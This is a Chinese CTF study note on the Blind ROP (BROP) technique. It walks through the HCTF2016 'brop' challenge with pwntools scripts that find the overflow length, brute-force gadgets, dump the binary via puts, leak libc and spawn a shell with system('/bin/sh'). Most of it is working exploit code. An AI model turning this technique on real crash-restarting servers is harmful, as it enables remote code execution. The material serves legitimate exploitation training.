pwn学习总结(三) —— BROP
-
- 描述
- 利用条件
- 攻击思路
- 例题
-
- 判断栈溢出长度
- 寻找 stop gadgets
- 寻找 brop gadgets
- 寻找 puts 函数的 plt 地址
- 寻找 puts 函数的 got 地址并 dump plt 表
- getshell
描述
- BROP(Blind ROP)于 2014 年由 Standford 的 Andrea Bittau 提出,其相关研究成果发表在 Oakland 2014
- 在 CTF 中,BROP 技术一般在出题方未提供二进制文件的情况下进行使用
利用条件
- 源程序必须存在栈溢出漏洞,以便于攻击者可以控制程序流程
- 服务器端的进程在崩溃之后会重新启动,并且重新启动的进程的地址与先前的地址一样(这也就是说即使程序有 ASLR 保护,但是其只是在程序最初启动的时候有效果)
- 目前 nginx、MySQL、Apache、OpenSSH 等服务器应用都符合这种特性
攻击思路
- 判断栈溢出长度,如有必要可以通过栈溢出来泄露 canaries、rbp 和返回地址
- 寻找能够返回到 main 函数的 gadgets(通常称为 stop_gadget)
- 寻找 brop gadgets(例如 __libc_csu_init 中的 gadgets),定位 pop rdi ; ret 的地址
- 寻找 puts 或 write 函数的 plt,用于 leak 其它地址的值
- dump plt 表,用于 leak 所需函数的 got 地址
- 通过 leak 到的 got 地址,找到对应 libc 版本,通过 libc 执行系统命令进行 getshell
例题
平台:HCTF2016
题目:brop
判断栈溢出长度
#-*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
#context.arch = 'i386'/'amd64'
def GetBufLength():
i = 1
while 1:
try:
sh = process('./brop')
sh.recvuntil('Do you know password?\n')
payload = 'a' * i
sh.send(payload)
output = sh.recv()
#未成功返回到main函数
if not output.startswith('No password'):
return i - 1
else:
i += 1
#触发栈溢出异常
except EOFError:
sh.close()
return i - 1
buf_length = GetBufLength()
print(buf_length)
寻找 stop gadgets
#-*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
#context.arch = 'i386'/'amd64'
buf_length = 72
def GetStopAddr():
address = 0x400000
while 1:
print(hex(address))
try:
sh = process('./brop')
sh.recvuntil('Do you know password?\n')
payload = 'a'*buf_length + p64(address)
sh.send(payload)
output = sh.recv()
#未成功返回到main函数头部开始执行
if not output.startswith('WelCome my friend'):
sh.close()
address += 1
else:
return address
#触发栈溢出异常
except EOFError:
address += 1
sh.close()
stop_gadgets = GetStopAddr()
print('stop gadgets = 0x%x' % stop_gadgets)
寻找 brop gadgets
#-*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
#context.arch = 'i386'/'amd64'
def GetBropGadgets(buf_length, stop_gadgets, address):
try:
sh = process('./brop')
sh.recvuntil('Do you know password?\n')
#寻找 pop_rbx_rbp_r12_r13_r14_r15_ret
payload = 'a'*buf_length + p64(address) + p64(0)*6 + p64(stop_gadgets)
sh.sendline(payload)
output = sh.recv(timeout=1)
sh.close()
if not output.startswith('WelCome my friend'):
return False
return True
except Exception:
sh.close()
return False
def check(buf_length, address):
try:
sh = process('./brop')
sh.recvuntil('Do you know password?\n')
payload = 'a'*buf_length + p64(address) + p64(0)*7
sh.sendline(payload)
output = sh.recv(timeout=1)
sh.close()
return False
except Exception:
sh.close()
return True
buf_length = 72
stop_gadgets = 0x4005d0
address = 0x400500
while 1:
print(hex(address))
if GetBropGadgets(buf_length, stop_gadgets, address):
print('possible brop gadget: 0x%x' % address)
if check(buf_length, address):
print('success brop gadget: 0x%x' % address)
break
address += 1
寻找 puts 函数的 plt 地址
#-*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
#context.arch = 'i386'/'amd64'
buf_length = 72
stop_gadgets = 0x4005d0
brop_gadgets = 0x4007ba
pop_rdi_ret = brop_gadgets + 9
def GetPutsPlt():
addr = 0x400500
while 1:
print(hex(addr))
try:
sh = process('./brop')
sh.recvuntil('Do you know password?\n')
payload = 'a'*buf_length + p64(pop_rdi_ret) + p64(0x400000) + p64(addr) + p64(stop_gadgets)
sh.sendline(payload)
output = sh.recv()
sh.close()
if output.startswith('\x7fELF'):
print('puts plt address = 0x%x' % addr)
return addr
addr += 1
except Exception:
sh.close()
addr += 1
GetPutsPlt()
寻找 puts 函数的 got 地址并 dump plt 表
#-*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
#context.arch = 'i386'/'amd64'
def leak(buf_length, pop_rdi_ret, leak_addr, puts_plt, stop_gadgets):
sh = process('./brop')
sh.recvuntil('Do you know password?\n')
payload = 'a'*buf_length + p64(pop_rdi_ret) + p64(leak_addr) + p64(puts_plt) + p64(stop_gadgets)
sh.send(payload)
try:
data = sh.recvuntil('\nWelCome my friend', drop=True)
sh.close()
if data == "":
data = '\x00'
sh.close()
return data
except:
sh.close()
return None
buf_length = 72
stop_gadgets = 0x4005d0
brop_gadgets = 0x4007ba
pop_rdi_ret = brop_gadgets + 9
puts_plt = 0x400565
leak_addr = 0x400000
result = ""
while leak_addr < 0x401000:
print(hex(leak_addr))
data = leak(buf_length, pop_rdi_ret, leak_addr, puts_plt, stop_gadgets)
if data is None:
continue
else:
result += data
leak_addr += len(data)
with open('./code','wb') as f:
f.write(result)
使用 IDA 分析 DUMP 出来的数据:
getshell
#-*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
#context.arch = 'i386'/'amd64'
sh = process('./brop')
buf_length = 72
stop_gadgets = 0x4005d0
brop_gadgets = 0x4007ba
pop_rdi_ret = brop_gadgets + 9
puts_plt = 0x400565
puts_got = 0x601018
sh.recvuntil('Do you know password?\n')
payload = 'a' * buf_length
payload += p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt)
payload += p64(stop_gadgets)
sh.sendline(payload)
puts_addr = u64(sh.recvuntil('\nWelCome my friend', drop=True).ljust(8, '\x00'))
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
#####################################################
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
sh.recvuntil('Do you know password?\n')
payload = 'a' * buf_length
payload += p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr) + p64(stop_gadgets)
#pwnlib.gdb.attach(proc.pidof(sh)[0])
sh.sendline(payload)
sh.interactive()